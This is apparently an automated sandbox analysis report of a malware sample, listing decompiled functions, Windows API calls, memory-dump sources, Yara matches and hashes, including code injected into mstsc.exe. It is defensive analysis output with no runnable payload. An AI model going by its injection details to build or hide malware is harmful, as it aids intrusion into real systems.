Instruction Fuzzy Hash: B090027164150402D10061A948087474085A7D0342F51C011A5194559EC6A5C8917571

Uniqueness

Uniqueness Score: -1.00%

Function 019C9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727c18487dfd7ce8a7918b5e6ccfaa706162ca5d24687a8a93f0a8a7bb4871f2
Instruction ID: 2df47c3c55f8f26aae733d08490ad85b1a19f636b57cd5dd94cd28e6a2131550
Opcode Fuzzy Hash: 727c18487dfd7ce8a7918b5e6ccfaa706162ca5d24687a8a93f0a8a7bb4871f2
Instruction Fuzzy Hash: AA90027164514842D14071A94404A464095A7D0345F51C011A0094698DD6658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 019C9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 06e6549302f94e8e7b6155bc236af52909f54de02a2997fef9dbcf6b707c3719
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01A1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01A1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E019CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01A15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01A15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x01a1fdda
0x01a1fde2
0x01a1fde5
0x01a1fdec
0x01a1fdfa
0x01a1fdff
0x01a1fe0a
0x01a1fe0f
0x01a1fe17
0x01a1fe1e
0x01a1fe19
0x01a1fe19
0x01a1fe19
0x01a1fe20
0x01a1fe21
0x01a1fe22
0x01a1fe25
0x01a1fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A1FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A1FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A1FE2B

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 14ee1b2955c035eace6bfced542ae7f4c81f773b10c245871addc7906a333170
Instruction ID: eefe1572b7f9f40aa6499c4cb34adbb3b43abfe189a35110529281b10fdf79fb
Opcode Fuzzy Hash: 14ee1b2955c035eace6bfced542ae7f4c81f773b10c245871addc7906a333170
Instruction Fuzzy Hash: 24F0F672600241BFEA211B45DC02F23BF6FEB85B30F140318F62C565D1DA62F86096F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstsc.exe PID: 1320 Parent PID: 3472 mstsc.exeCOMMON

Executed Functions

Function 03049D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03044B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B87,007A002E,00000000,00000060,00000000,00000000), ref: 03049DAD

Strings

.z`, xrefs: 03049D9D, 03049DA8

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: f41578dfc827fbb232737be5bfc2c5493797f10197c0c1d4ce8d26a5573b5a92
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 52F0B2B2201208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03049E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03044D42,5EB6522D,FFFFFFFF,03044A01,?,?,03044D42,?,03044A01,FFFFFFFF,5EB6522D,03044D42,?,00000000), ref: 03049E55

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3a02e5edab1dab63e33aec74c8a471c2e57566913d2fac47853da605e1ce8c57
Instruction ID: 19a93fd7f9a59895a57fcbb073729c263aca939f9b2e67ab7ab5198b55c68256
Opcode Fuzzy Hash: 3a02e5edab1dab63e33aec74c8a471c2e57566913d2fac47853da605e1ce8c57
Instruction Fuzzy Hash: AFF0E7B6210208ABCB18DF89CC81DEB77E9EF8C754F058259FE0D97251D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03049E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03044D42,5EB6522D,FFFFFFFF,03044A01,?,?,03044D42,?,03044A01,FFFFFFFF,5EB6522D,03044D42,?,00000000), ref: 03049E55

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: eca8452a836c60ae1e674592a566445603dba106c16a6e42fb5d1e013b0695a3
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 5AF0A4B6200208ABDB14DF89DC80EEB77ADEF8C754F158258BA1DA7241D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03049F3A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F79

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7b39028280b459cbe4b693c6905ba0409f992cdef1a20d322433b35c195a46f9
Instruction ID: 5cb969c86f5918d87739bc3d887195530261d3870e2ab4bd82ccc27524b78a09
Opcode Fuzzy Hash: 7b39028280b459cbe4b693c6905ba0409f992cdef1a20d322433b35c195a46f9
Instruction Fuzzy Hash: BDF0A7B51051496BDB15DF59DC84CD7BB98EF89250B158A6DF94C97202C630D814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03049F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F79

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: ce39972e4f6941cdf02dad32c7c6d921ca6af5813ba32caee0b59efe5ecfc345
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 83F015B6200208ABDB14DF89CC80EEB77ADEF88650F118158BE08A7241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03049E8A, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03044D20,?,?,03044D20,00000000,FFFFFFFF), ref: 03049EB5

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2b43b18c1f9910c2680c5b4e0670f3cc1b2010d331d57e56f44b32ae5ea6f047
Instruction ID: 3e1d607f64078a794f141ded4f92bd3339639e48ce012cb5f12080e9d4d0bab2
Opcode Fuzzy Hash: 2b43b18c1f9910c2680c5b4e0670f3cc1b2010d331d57e56f44b32ae5ea6f047
Instruction Fuzzy Hash: 00E0C27A200210BBD714EF94CC84FD77B29EF84310F058499FA585F241C130E604CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 03049E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03044D20,?,?,03044D20,00000000,FFFFFFFF), ref: 03049EB5

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2349c46c07cc34a6a6a5eb5b392336694d3dd72ae931ecc25b8d2f49e28e5b9c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 04D012752403147BD710EB98CC85ED7775CEF44650F154455BA585B241C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 050C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C991A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ec67edacd7f23cfd85c222c595358acbb1b442606788b2b99599e5ca8a6b992
Instruction ID: 9b51f5fefba68355e2ec59c9df385f204f7407f6a135cf5a984924e258b31af6
Opcode Fuzzy Hash: 6ec67edacd7f23cfd85c222c595358acbb1b442606788b2b99599e5ca8a6b992
Instruction Fuzzy Hash: 3B9002B224110902D1407159944474A411597D0341F91D011B5054554E86998DD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 050C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C954A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930bb6cee1b90e4c910465b0808d0900b53dc6669249154432865262e61f7cd9
Instruction ID: 4ed55de4e2566e70bc31f4ffcce9800d509186d4db4172c97685461e7b93386a
Opcode Fuzzy Hash: 930bb6cee1b90e4c910465b0808d0900b53dc6669249154432865262e61f7cd9
Instruction Fuzzy Hash: 16900477351105030105F55D574450F4157D7D53D17D1D031F1005550CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 050C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C99AA

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a986afc90b57207ce3e66c9c78b13f085eb93239dcb6bdc07082e70ceb0f6441
Instruction ID: d269a879977a48dbe92d3a4c6c2463b17c0dc2070dfe90e422fd6e6e3eb9ccd4
Opcode Fuzzy Hash: a986afc90b57207ce3e66c9c78b13f085eb93239dcb6bdc07082e70ceb0f6441
Instruction Fuzzy Hash: 8C9002A238110942D10061599454B0A4115D7E1341F91D015F1054554D8659CC527176

Uniqueness

Uniqueness Score: -1.00%

Function 050C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C95DA

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f438e516c1dd48bbaf3436d67c5f8ff63af31ff805b1041d99be8eee4b00649
Instruction ID: abcb0f738bdb1d6222b613d257f57ff32259515c49e7b42527c3fe3d62051fa5
Opcode Fuzzy Hash: 0f438e516c1dd48bbaf3436d67c5f8ff63af31ff805b1041d99be8eee4b00649
Instruction Fuzzy Hash: 729002A22421050341057159945461A811A97E0241F91D021F1004590DC56588917175

Uniqueness

Uniqueness Score: -1.00%

Function 050C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C984A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9f652117bdfc156804b438aae6e42c4273ffcb823721c3bc951d8fe834c75e2
Instruction ID: 63356163c719addbf13fefad3fb2508700126c61c8f8db2f5855c7377c0654ce
Opcode Fuzzy Hash: a9f652117bdfc156804b438aae6e42c4273ffcb823721c3bc951d8fe834c75e2
Instruction Fuzzy Hash: A4900262282146525545B159944450B8116A7E0281BD1D012B1404950C85669856E671

Uniqueness

Uniqueness Score: -1.00%

Function 050C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C986A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2fdbcf941097258f67734d2a8b1368c381501900f6ba15bcfd8618af0cb035f
Instruction ID: c990ff24b2fda2b63f623bb03397c9b4dbffbd2785f28e6ef20ea86b6cf6bb1e
Opcode Fuzzy Hash: a2fdbcf941097258f67734d2a8b1368c381501900f6ba15bcfd8618af0cb035f
Instruction Fuzzy Hash: F390027224110913D1116159954470B411997D0281FD1D412B0414558D96968952B171

Uniqueness

Uniqueness Score: -1.00%

Function 050C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C971A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77808a9a0acce1188db9972ec075b9a57baa8cc75e782ebe4570deef1e8bbbc8
Instruction ID: f989b99c1788d38724efc6c97902f0bb78ff8894f6169b9fca508a3433f9e39d
Opcode Fuzzy Hash: 77808a9a0acce1188db9972ec075b9a57baa8cc75e782ebe4570deef1e8bbbc8
Instruction Fuzzy Hash: 4490027224110902D1006599A44864A411597E0341F91E011B5014555EC6A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 050C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C978A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2535c85de7133c8da5aa1f1f5bbb7480d7074caac6f2cbb5fac827cef8f461ba
Instruction ID: eb7a4dfbf64d8e1514e3b997a98fa3e5c1f037bd7346a3eeaec1281db84a8ef3
Opcode Fuzzy Hash: 2535c85de7133c8da5aa1f1f5bbb7480d7074caac6f2cbb5fac827cef8f461ba
Instruction Fuzzy Hash: B490026A25310502D1807159A44860E411597D1242FD1E415B0005558CC95588696371

Uniqueness

Uniqueness Score: -1.00%

Function 050C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9FEA

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a241cd350b8e172fd38834424f4eeff1d6be7a224c10ad5d377253a01e5c6a28
Instruction ID: 4fa4ece528165c115a19d6db7fe4118b4b706d5d5799078bf0f992670ee2342d
Opcode Fuzzy Hash: a241cd350b8e172fd38834424f4eeff1d6be7a224c10ad5d377253a01e5c6a28
Instruction Fuzzy Hash: 5C90027235124902D1106159D44470A411597D1241F91D411B0814558D86D588917172

Uniqueness

Uniqueness Score: -1.00%

Function 050C9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C965A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d499ea1ea26eb6354930d297d657f8d9beba767cd8884f6e27a83bcc8edeece
Instruction ID: f62f6535ab867ea73fcfd894175616f69d2f8b4ce940b77ef2de4788faac70f5
Opcode Fuzzy Hash: 0d499ea1ea26eb6354930d297d657f8d9beba767cd8884f6e27a83bcc8edeece
Instruction Fuzzy Hash: 5B90027224514D42D14071599444A4A412597D0345F91D011B0054694D96658D55B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 050C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9A5A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6ff2758363da8587c5f84b91fe680ca8eafe70956b6f3c1198c9775493e220c
Instruction ID: a5c734553dbac5637c7c0e894163a382b751f6cf6d018723075e4f0718f996e6
Opcode Fuzzy Hash: b6ff2758363da8587c5f84b91fe680ca8eafe70956b6f3c1198c9775493e220c
Instruction Fuzzy Hash: 7690026225190542D20065699C54B0B411597D0343F91D115B0144554CC95588616571

Uniqueness

Uniqueness Score: -1.00%

Function 050C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C966A

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee25fa6caece8c95cc7555180ad94f8a023e85c38989c317bbadca6707ee1ba5
Instruction ID: 0b6463386a4a1af0f815bc8acaa03d4c2bccb0fb1acd73bc399a8a6baaec8d46
Opcode Fuzzy Hash: ee25fa6caece8c95cc7555180ad94f8a023e85c38989c317bbadca6707ee1ba5
Instruction Fuzzy Hash: 3890027224110D02D1807159944464E411597D1341FD1D015B0015654DCA558A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 050C96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C96DA

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3e385dd19e1d84e40b0c8dd410b9919491b4770cfbf5284fa6f6b1bc42ed9e7
Instruction ID: 8506af557483d4cf1a4651772ce1ccd300dca49e8bdede49b449c5c08f6266d3
Opcode Fuzzy Hash: c3e385dd19e1d84e40b0c8dd410b9919491b4770cfbf5284fa6f6b1bc42ed9e7
Instruction Fuzzy Hash: 0C90027224110D42D10061599444B4A411597E0341F91D016B0114654D8655C8517571

Uniqueness

Uniqueness Score: -1.00%

Function 050C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C96EA

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31c89a4aa8e32ade0a58afddcb598e13c069314e390f69d20d8708296cdd3e7f
Instruction ID: a7c7ea160c74ce98e8401523685e7b23a17e49d37c343c7f76255840d83275b9
Opcode Fuzzy Hash: 31c89a4aa8e32ade0a58afddcb598e13c069314e390f69d20d8708296cdd3e7f
Instruction Fuzzy Hash: 5B90027224118D02D1106159D44474E411597D0341F95D411B4414658D86D588917171

Uniqueness

Uniqueness Score: -1.00%

Function 0304A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03033AF8), ref: 0304A09D

Strings

.z`, xrefs: 0304A08C, 0304A098

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 5c8b509fc3cf77c1b27d53bec555c56379d9d043872341c6554c92a40a221626
Instruction ID: b3c731b75c0ae95efbb1a9542a0f797d9a089f6501b77f426509a766d6e7dd46
Opcode Fuzzy Hash: 5c8b509fc3cf77c1b27d53bec555c56379d9d043872341c6554c92a40a221626
Instruction Fuzzy Hash: 81E06DB56003086BD715DF98DC45EE77BA9EF84610F018654F9985B342DA34E9118BF0

Uniqueness

Uniqueness Score: -1.00%

Function 0304A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03033AF8), ref: 0304A09D

Strings

.z`, xrefs: 0304A08C, 0304A098

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: df2556ebf7c68f88a1f031a50b34e7094d1472b5f95cb1668054ad95c7347931
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F8E012B5200208ABDB18EF99CC88EA777ACEF88650F018558BA086B241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 030382E9, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f2259ec3d21190adbca337ea044c74c6f3ff49d95f02e75daafbce68f76ea5b0
Instruction ID: 08d612b0a1dfca6bd82befbd4305d89d01f67a98394d89416c62d9494cb48f94
Opcode Fuzzy Hash: f2259ec3d21190adbca337ea044c74c6f3ff49d95f02e75daafbce68f76ea5b0
Instruction Fuzzy Hash: 4601F771A823287BEB20E6959D42FFF776C6B81B50F044058FF04BE1C0E6D46A0A43E6

Uniqueness

Uniqueness Score: -1.00%

Function 030382F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 9d3f72832f5eb0d0b2d160f147095ca8cae2aabdd755a362357de0c87e7993c5
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 6101A771A823287BE720E6959C42FFE776C6B81A51F044158FF04BE1C0E6D46A0A46F6

Uniqueness

Uniqueness Score: -1.00%

Function 03038378, Relevance: 3.0, APIs: 2, Instructions: 42threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 17cffd43b132cfb01f657f39d956b7bd680dd1730c4bc997f35d88f75f886b5a
Instruction ID: 4a7ce42a83204b5bef069afd7bf8ecc09f88999f17caefa6f052786ac9bc4eb7
Opcode Fuzzy Hash: 17cffd43b132cfb01f657f39d956b7bd680dd1730c4bc997f35d88f75f886b5a
Instruction Fuzzy Hash: 24F0EC35B8272836F520A5585C43FFF725CAB82E51F1940A5FF08FD6C0E5C9650A01FA

Uniqueness

Uniqueness Score: -1.00%

Function 03038373, Relevance: 3.0, APIs: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
